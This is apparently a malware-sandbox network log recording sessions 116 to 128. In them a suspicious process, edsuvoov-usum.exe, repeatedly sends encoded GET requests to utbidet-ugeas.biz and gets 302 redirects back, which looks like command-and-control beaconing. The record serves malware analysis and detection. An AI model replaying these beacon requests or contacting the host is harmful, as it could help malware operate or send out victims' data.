                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            116192.168.2.361485172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:00.624237061 CEST169OUTGET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:01.138006926 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:01 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            117192.168.2.361486172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:01.163614035 CEST201OUTGET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:01.656521082 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:01 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            118192.168.2.361488172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:01.788566113 CEST169OUTGET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:02.269860983 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            119192.168.2.361489172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:02.282063007 CEST201OUTGET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:02.760550022 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            120192.168.2.361491172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:03.601428986 CEST169OUTGET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:04.084835052 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:04 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            121192.168.2.361492172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:04.091142893 CEST201OUTGET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:04.580857992 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:04 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            122192.168.2.361494172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:05.507308960 CEST169OUTGET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:06.015573025 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            123192.168.2.361495172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:06.032988071 CEST201OUTGET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:06.523819923 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:06 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            124192.168.2.361497172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:06.695609093 CEST169OUTGET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:07.185998917 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:07 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            125192.168.2.361498172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:07.202653885 CEST201OUTGET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:07.698057890 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:07 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            126192.168.2.361500172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:07.895905972 CEST169OUTGET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:08.384515047 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:08 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            127192.168.2.361501172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:08.390729904 CEST201OUTGET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:36:08.904094934 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:08 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            128192.168.2.361503172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:36:09.366636992 CEST169OUTGET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:36:09.848073959 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:36:09 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
